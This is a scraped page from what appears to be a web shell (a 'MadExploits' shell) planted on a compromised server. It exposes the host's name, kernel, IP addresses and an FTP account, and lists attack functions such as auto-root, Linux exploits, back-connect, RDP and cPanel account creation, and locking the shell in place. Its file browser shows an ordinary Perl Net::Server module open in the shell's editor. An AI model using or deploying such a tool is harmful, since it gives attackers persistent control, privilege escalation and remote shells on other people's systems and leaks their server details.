Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
Net /
Server /
[ HOME SHELL ]
Name
Size
Permission
Action
Log
[ DIR ]
drwxr-xr-x
Proto
[ DIR ]
drwxr-xr-x
Daemonize.pm
9.43
KB
-rw-r--r--
Fork.pm
9.17
KB
-rw-r--r--
HTTP.pm
35.6
KB
-rw-r--r--
INET.pm
5.19
KB
-rw-r--r--
MultiType.pm
5.21
KB
-rw-r--r--
Multiplex.pm
15.15
KB
-rw-r--r--
PSGI.pm
9.68
KB
-rw-r--r--
PreFork.pm
21.96
KB
-rw-r--r--
PreForkSimple.pm
17.4
KB
-rw-r--r--
Proto.pm
25.81
KB
-rw-r--r--
SIG.pm
4.8
KB
-rw-r--r--
Single.pm
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Single.pm
# -*- perl -*- # # Net::Server::Single - Net::Server personality # # Copyright (C) 2001-2017 # # Paul Seamons <paul@seamons.com> # # This package may be distributed under the terms of either the # GNU General Public License # or the # Perl Artistic License # # All rights reserved. # ################################################################ package Net::Server::Single; use strict; use base qw(Net::Server); sub net_server_type { __PACKAGE__ } ### this module is simple a place holder so that ### Net::Server::MultiType can ask for Single as one of ### the fall back methods (which it does any way). ### Essentially all we are doing here is providing parallelism. 1; __END__ =head1 NAME Net::Server::Single - Net::Server personality =head1 SYNOPSIS use base qw(Net::Server::Single); sub process_request { #...code... } =head1 DESCRIPTION This module offers no functionality beyond the Net::Server base class. This modules only purpose is to provide parallelism for the MultiType personality. See L<Net::Server> =cut
Close